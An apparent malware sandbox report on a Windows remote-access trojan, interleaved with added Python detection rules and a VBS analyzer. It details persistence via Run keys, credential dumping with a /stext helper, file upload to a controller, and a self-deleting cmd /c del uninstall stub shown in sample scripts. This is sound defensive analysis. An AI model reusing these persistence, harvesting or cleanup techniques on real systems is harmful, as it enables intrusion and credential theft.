                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                      • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                      • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-1941338355
                                      • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                      • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                      • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                      • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                      • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                      • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                      • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                      • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                      • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                      • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                      • Sleep.KERNEL32(00000064), ref: 00412E94
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "$0TG$0TG$NG$NG
                                      • API String ID: 1223786279-2576077980
                                      • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                      • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                      • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                      • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%
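Several of the functions listed above leave telemetry that a detection engineer can key on. The install routine copies the binary to C:\Users\user\AppData\Roaming\NvbYSEq.exe, sets attributes 0x7 (read-only, hidden, system) and relaunches it via ShellExecuteW; the persistence strings name both Software\Microsoft\Windows\CurrentVersion\Run\ and ...\Policies\Explorer\Run\, and the uninstall path removes the entry from HKEY_CURRENT_USER (RegDeleteKeyA with 0x80000001). The update routine creates the replacement with GetTempFileNameW(prefix "temp_") plus ".exe"; GetTempFileName uses only the first three characters of the prefix and up to four hex digits, so the file lands as %TEMP%\tem<hex>.tmp.exe. The harvest routine runs a helper with `/stext "<file>"`, sleeps, deletes the output files and sends the result; `/stext` is the switch NirSoft's command-line password-recovery tools use to write a text report (that identification is mine, the report does not name the helper). The rules below are an added example, not part of the Joe Sandbox report: they run over constructed Sysmon-style events, and the helper name `helper.exe`, the Run value name, the event schema and the hex suffix of the temp file are assumptions.

```python
import re

# Constructed Sysmon-style events, not logs from the sandbox run. Paths the
# report lists are kept; helper.exe, the Run value name, out.dat and the temp
# file's hex suffix are assumptions.
EVENTS = [
    {"type": "process", "image": r"C:\Users\user\AppData\Roaming\NvbYSEq.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\NvbYSEq.exe"'},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\NvbYSEq.exe", "attributes": 0x7},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NvbYSEq",
     "data": r"C:\Users\user\AppData\Roaming\NvbYSEq.exe"},
    {"type": "process", "image": r"C:\Users\user\AppData\Local\Temp\tem1A2B.tmp.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\tem1A2B.tmp.exe"'},
    {"type": "process", "image": r"C:\Users\user\AppData\Local\Temp\helper.exe",
     "cmdline": r'helper.exe /stext "C:\Users\user\AppData\Local\Temp\out.dat"'},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\update.vbs"'},
    # benign noise the rules must stay quiet on
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "data": r"C:\Program Files\Vendor\agent.exe"},
    {"type": "file", "path": r"C:\Users\user\Documents\notes.txt", "attributes": 0x20},
]

FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN, FILE_ATTRIBUTE_SYSTEM = 0x1, 0x2, 0x4
# the 0x7 passed to SetFileAttributesW in the install routine above
HIDDEN_SYSTEM_RO = FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM

RUN_KEYS = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(?:Policies\\Explorer\\)?Run\\", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local\\Temp)\\", re.I)
# GetTempFileNameW keeps only three prefix characters: "temp_" + ".exe" -> tem<hex>.tmp.exe
TEMP_UPDATE = re.compile(r"\\Temp\\tem[0-9a-f]{1,4}\.tmp\.exe$", re.I)
STEXT = re.compile(r'(?:^|\s)/stext\s+"', re.I)
TEMP_VBS = re.compile(r'\\Temp\\[^\\"]+\.vbs"?$', re.I)


def run_key_to_user_path(ev):
    """Run / Policies\\Explorer\\Run value whose target lives in AppData or Temp."""
    return (ev["type"] == "registry" and bool(RUN_KEYS.search(ev["key"]))
            and bool(USER_WRITABLE.search(ev["data"])))


def hidden_system_exe_in_appdata(ev):
    """Executable under AppData marked read-only + hidden + system, as the install routine does."""
    return (ev["type"] == "file" and ev["path"].lower().endswith(".exe")
            and bool(USER_WRITABLE.search(ev["path"]))
            and ev["attributes"] & HIDDEN_SYSTEM_RO == HIDDEN_SYSTEM_RO)


def temp_update_binary(ev):
    """Process image matching the GetTempFileName-derived update name."""
    return ev["type"] == "process" and bool(TEMP_UPDATE.search(ev["image"]))


def stext_dump(ev):
    """Command line carrying the /stext report switch."""
    return ev["type"] == "process" and bool(STEXT.search(ev["cmdline"]))


def wscript_temp_vbs(ev):
    """wscript.exe launched on a .vbs in Temp (the uninstall stub)."""
    return (ev["type"] == "process" and ev["image"].lower().endswith("\\wscript.exe")
            and bool(TEMP_VBS.search(ev["cmdline"])))


RULES = {
    "run_key_to_user_path": run_key_to_user_path,
    "hidden_system_exe_in_appdata": hidden_system_exe_in_appdata,
    "temp_update_binary": temp_update_binary,
    "stext_dump": stext_dump,
    "wscript_temp_vbs": wscript_temp_vbs,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]
```

A Run value pointing into AppData\Roaming is also how many legitimate per-user installers persist, so `run_key_to_user_path` is a correlation signal rather than an alert on its own; the combination with the hidden/system attribute on the same path, or with a `tem<hex>.tmp.exe` child, is what raises confidence. Note also that the uninstall routine resets attributes to 0x80 before deleting, so the attribute rule only fires while the implant is installed, not during cleanup.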

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                      • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                      • API String ID: 1332880857-3714951968
                                      • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                      • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                      • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                      • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                      • GetCursorPos.USER32(?), ref: 0041D5E9
                                      • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                      • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                      • ExitProcess.KERNEL32 ref: 0041D665
                                      • CreatePopupMenu.USER32 ref: 0041D66B
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                      • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                      • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                      • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                      • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                      • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                      • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                      • __aulldiv.LIBCMT ref: 00408D4D
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                      • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                      • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                      • API String ID: 3086580692-2582957567
                                      • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                      • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                      • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                      • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 0040A740
                                        • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                        • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                        • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                        • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                      • API String ID: 3795512280-1152054767
                                      • Opcode ID: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                                      • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                      • Opcode Fuzzy Hash: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                                      • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 004048E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                      • WSAGetLastError.WS2_32 ref: 00404A21
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-3229884001
                                      • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                      • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                      • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                      • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0045130A
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                      • _free.LIBCMT ref: 004512FF
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00451321
                                      • _free.LIBCMT ref: 00451336
                                      • _free.LIBCMT ref: 00451341
                                      • _free.LIBCMT ref: 00451363
                                      • _free.LIBCMT ref: 00451376
                                      • _free.LIBCMT ref: 00451384
                                      • _free.LIBCMT ref: 0045138F
                                      • _free.LIBCMT ref: 004513C7
                                      • _free.LIBCMT ref: 004513CE
                                      • _free.LIBCMT ref: 004513EB
                                      • _free.LIBCMT ref: 00451403
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                      • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                      • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00419FB9
                                      • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                      • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                      • GetLocalTime.KERNEL32(?), ref: 0041A105
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                      • API String ID: 489098229-1431523004
                                      • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                      • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                      • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                      • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                        • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                        • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                        • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                      • ExitProcess.KERNEL32 ref: 0040D9C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                      • API String ID: 1913171305-3159800282
                                      • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                      • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                      • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                      • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                      Uniqueness

                                      Uniqueness Score: -1.00%
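
The record above is the stub's uninstall path: it assembles a .vbs in the Temp directory from the fragments CreateObject("WScript.Shell").Run "cmd /c "" ... """, 0 and CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), launches it with ShellExecuteW("open") and calls ExitProcess, so the script removes the executable and then itself. The following Python check is an added example, not code from the report or from the malware: it parses candidate .vbs text for a hidden cmd /c launch combined with self-deletion, and also resolves Set x = CreateObject(...) aliases so a rewritten variant is still caught. The three sample scripts are constructed for the demo; what the stub places between the cmd /c quotes is not visible in the report, so the del command in the first sample is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# ProgID constructors as they appear in the string fragments of the record above.
_WSH = r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)'
_FSO = r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)'


def _aliases(text: str, progid_re: str) -> List[str]:
    """Variable names bound with  Set x = CreateObject("...")  so x.Method calls count too."""
    return re.findall(r'Set\s+(\w+)\s*=\s*' + progid_re, text, re.IGNORECASE)


def _callers(text: str, progid_re: str) -> str:
    """Regex alternation of the inline constructor and every alias bound to it."""
    names = [progid_re] + [r'\b' + re.escape(a) + r'\b' for a in _aliases(text, progid_re)]
    return "(?:" + "|".join(names) + ")"


@dataclass
class VbsFinding:
    run_commands: List[Tuple[str, Optional[int]]] = field(default_factory=list)
    hidden_cmd: bool = False      # a "cmd /c ..." launched with window style 0
    self_deletes: bool = False    # DeleteFile(WScript.ScriptFullName)

    @property
    def suspicious(self) -> bool:
        # Both halves of the uninstall pattern shown in the record above.
        return self.hidden_cmd and self.self_deletes


def analyze_vbs(text: str) -> VbsFinding:
    f = VbsFinding()
    # <shell>.Run "<cmd>"[, <windowstyle>[, <wait>]]; VBScript doubles quotes inside strings.
    run_re = re.compile(
        _callers(text, _WSH) + r'\s*\.\s*Run\s+"(?P<cmd>(?:""|[^"])*)"'
        r'(?:\s*,\s*(?P<style>\d+))?', re.IGNORECASE)
    for m in run_re.finditer(text):
        cmd = m.group("cmd").replace('""', '"')
        style = int(m.group("style")) if m.group("style") else None
        f.run_commands.append((cmd, style))
        # Accept "cmd /c", "cmd.exe /c" and a full path to cmd.exe.
        if style == 0 and re.match(r'\s*"?(?:[^"\s\\]*\\)*cmd(?:\.exe)?"?\s+/c\b', cmd, re.IGNORECASE):
            f.hidden_cmd = True
    # <fso>.DeleteFile(WScript.ScriptFullName), with or without parentheses.
    selfdel_re = re.compile(
        _callers(text, _FSO) + r'\s*\.\s*DeleteFile\s*\(?\s*WScript\.ScriptFullName', re.IGNORECASE)
    f.self_deletes = selfdel_re.search(text) is not None
    return f


def triage(scripts) -> List[str]:
    """Names of the scripts that show the hidden-cmd plus self-delete pattern."""
    return [name for name, text in scripts.items() if analyze_vbs(text).suspicious]


# Constructed samples (not from the sandbox run). The first has the shape the
# fragments above imply; the del command between the cmd /c quotes is an assumption.
SAMPLE_UNINSTALL_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""timeout 3 & del '
    'C:\\Users\\victim\\AppData\\Roaming\\remcos\\remcos.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
# A benign script that also uses WScript.Shell, through an alias and a visible window.
SAMPLE_BENIGN_VBS = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run "notepad.exe C:\\Users\\victim\\notes.txt", 1\r\n'
)
# The same uninstall logic rewritten with aliases, a full cmd.exe path and no parentheses.
SAMPLE_ALIASED_VBS = (
    'Set ws = CreateObject("WScript.Shell")\r\n'
    'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    'ws.Run "C:\\Windows\\System32\\cmd.exe /c del C:\\ProgramData\\x.exe", 0, False\r\n'
    'fso.DeleteFile WScript.ScriptFullName\r\n'
)
SAMPLES = {"uninstall": SAMPLE_UNINSTALL_VBS, "benign": SAMPLE_BENIGN_VBS, "aliased": SAMPLE_ALIASED_VBS}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = analyze_vbs(text)
        print(f"{name}: suspicious={r.suspicious} hidden_cmd={r.hidden_cmd} "
              f"self_deletes={r.self_deletes} runs={r.run_commands}")
```

Run it over every .vbs found under the user's Temp directory of a suspect host (ShellExecuteW on a script there, followed by the parent exiting, is the sequence the record describes); the unescaped Run command it returns is what to pair with the process-creation telemetry for wscript.exe and cmd.exe.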

                                      APIs
                                      Memory Dump Source
